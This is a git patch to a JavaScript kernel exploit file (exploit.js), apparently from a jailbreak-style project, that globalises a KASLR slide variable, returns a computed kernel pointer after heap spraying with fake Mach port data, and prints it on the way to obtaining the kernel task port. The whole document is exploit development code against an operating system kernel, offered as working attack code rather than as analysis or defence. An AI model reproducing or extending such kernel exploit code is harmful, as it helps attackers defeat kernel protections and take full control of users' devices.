From 8d989c872c7127f12ebc19b0c9a98916657f571f Mon Sep 17 00:00:00 2001
From: spv420 <unomilliono@gmail.com>
Date: Sun, 24 Apr 2022 14:18:41 -0400
Subject: more shit

---
 src/js/kexp/exploit.js | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 5296e6e..402dd9f 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -20,6 +20,8 @@ var KERN_SUCCESS = 0;
 var NULL = 0;
 var MACH_PORT_NULL = 0;
 
+var kslide = 0;
+
 var fakeportData = 0;
 
 var kOSSerializeDictionary      = 0x01000000;
@@ -130,11 +132,11 @@ function copyinPort(kport, cnt) {
 //			mach_port_deallocate(self, read_u32(data));
 //			write_u32(data, MACH_PORT_NULL);
 			spray_data(tst, strlen(tst) + 1, 10, fakeportData);
-			var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
+			kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
 			printf("still alive? %x\n", 420);
 			printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
-			sleep(1);
 			found = true;
+			return (read_u32(buf + (4 << 2)) - 0x78);
 		}
 	}
 
@@ -177,6 +179,8 @@ function get_kernel_task() {
 	sched_yield();
 	var kptr = copyinPort(kport, 2);
 
+	printf("0x%08x\n", kptr);
+
 	printf("get lucky\n");
 
 	return tfp0;
-- 
cgit v1.2.3